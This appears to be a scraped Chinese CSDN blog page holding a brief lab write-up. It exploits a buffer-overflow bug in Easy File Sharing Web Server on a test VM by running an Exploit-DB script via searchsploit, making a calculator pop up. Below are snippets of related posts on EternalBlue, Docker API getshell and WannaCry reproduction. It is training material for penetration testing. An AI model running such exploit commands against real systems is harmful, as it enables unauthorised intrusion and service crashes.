网络渗透复现A

最新推荐文章于 2023-12-29 17:00:58 发布
最新推荐文章于 2023-12-29 17:00:58 发布
阅读量376 收藏
点赞数
文章标签: 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/worker___/article/details/121924525
版权

一、漏洞渗透测试
1、靶机安装easy file sharing web server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119

实验过程

靶机安装efssetup

配置8000端口

查找EasyFileSharing的有关漏洞

searchsploit Easy File Sharing Web Server

再输入

python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000 

最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;

最低0.47元/天 解锁文章
worker___
关注
网络安全工具系列:网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
weixin_54626591的博客
08-05 311
网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
web渗透测试漏洞复现:docker API未授权漏洞复现并getshell
最新发布
HACKONE的博客
03-28 435
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 535
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
渗透复现A
Huangyuanyuan111的博客
12-15 2384
1、在靶机安装efssetup 2、使用nmap扫描,发现8080端口打开 3、对Easy File Sharing Web Server进行漏洞查找。 4、执行其中的漏洞脚本,发现计算机被打开
网络渗透———复现任务
m0_60411436的博客
11-07 294
1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 打开VM,从文件中打开Metasploitable2并登录,用户名跟密码都是msfadmin。显示msfadmin@metsploitable:~$ 即登录成功。然后运行infonfig确认靶机IP地址。 从kali信息收集中找到nmap并打开, 输入sudo passwd root登录 输入密码su root 成功获取root权限。
Web渗透实例复现(一)(通达OA11.2)
InterplanetaryW的博客
07-13 2216
以通达OA系统11.2版本为案例的Web渗透 1. 渗透背景: 目标站点:VM虚拟机 O A 版本:通达OA系统11.2 目标系统:Windows server 2008 R2 SP1 威胁等级:高危 渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User、PHPstorm、蚁剑、VMware 2. 存在漏洞 前台任意用户登录漏洞 前台未授权访问漏洞 管理后台文件上传漏洞 后台SQL注入漏洞 文件包含getshell 3. 漏洞复现 3.1 前台任意用户登录漏洞
Linux无文件木马程序渗透测试复现
永远是少年
06-15 1223
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
2024年网络安全比赛--综合渗透测试②(超详细)
Aluxian_的博客
11-26 2024
4.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将中数据库的账号密码作为flag提交;1.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将扫描开放的所有端口当作flag提交(例:21,22,23);6.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将root权限唯一的文件内容作为flag提交;2.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将初始界面中隐藏的信息作为 flag提交;✓ 服务器场景操作系统:未知(关闭链接)
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
【漏洞渗透测试复现easy file sharing server
qq_61947585的博客
11-21 870
渗透测试 easy file sharing server
渗透测试技巧总结【漏洞复现
kevinhanser
03-30 1249
本文将记录我收集到的渗透测试小技巧 将文件从Linux传输到Windows(后期利用
靶场复现渗透测试流程
sinat_38378265的博客
05-02 816
外网渗透 使用御剑扫描目录获取到管理员后台登陆界面。 (此处还有收集whois和ip等信息,由于是自己搭建的靶场就不搜集了) 使用nmap只能扫描到80端口开放。 然后登陆后台管理,尝试弱密码登陆,账号admin和密码admin123登陆成功。 登陆页面之后发现页面有上传文件,尝试直接上传一句话木马php,文件报错,而且有流量经过,说明不是js前端验证。然后尝试修改上传格式,添加了php格...
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
复现任务——漏洞渗透测试及Metasploit应用
m0_74087834的博客
12-29 1169
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。 见课本P127-133
Easy File Sharing Web Server漏洞渗透测试
qq_51634663的博客
12-15 599
复现环境 1、ExpNIS.Windos(靶机) 2、Easy File Sharing Web Server 6.9(软件) 3、Kali-Linux(攻击机) 漏洞复现 1、首先在靶机上安装软件Easy File Sharing Web Server 2018并打开(安装过程较为简单此处不详细说明) 2、在靶机上安装完成后我们还需要找到该靶机,在kali上使用nmap扫描该网段 3、发现靶机IP后,我们使用命令nmap -sV 【目标IP】查看该目标主机上运行的服务,例如在此处我.
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2231
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
初入渗透:CVE-2017-0199漏洞复现
qq_35538264的博客
03-30 1393
1:在 web根目录下/www : 创建一个1.rtf文件:附上代码 ;上是在kali中的服务; 在windows上创空的office;并在里面创建对象 , 这时候会生成一个有test789文字内嵌对象的文档,这是双击该对象只能以rtf文件方式打开对象,并不能执行hta脚本。因为生成对象的时候选中“链接到文件”,所以当打开对象的时候会去服务器上请求http://192.168.1.108/1.r...
漏洞复现(CVE-2017-10271)
PDblue的博客
03-27 9763
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
Numpy实践:贝叶斯网络复现与机器学习入门
资源摘要信息:"使用numpy复现贝叶斯网络" 一、贝叶斯网络基础 贝叶斯网络(Bayesian Network),又称信念网络、有向无环图模型,是一种统计模型,它通过图形化的方式表示一组随机变量及其条件依赖关系。贝叶斯网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值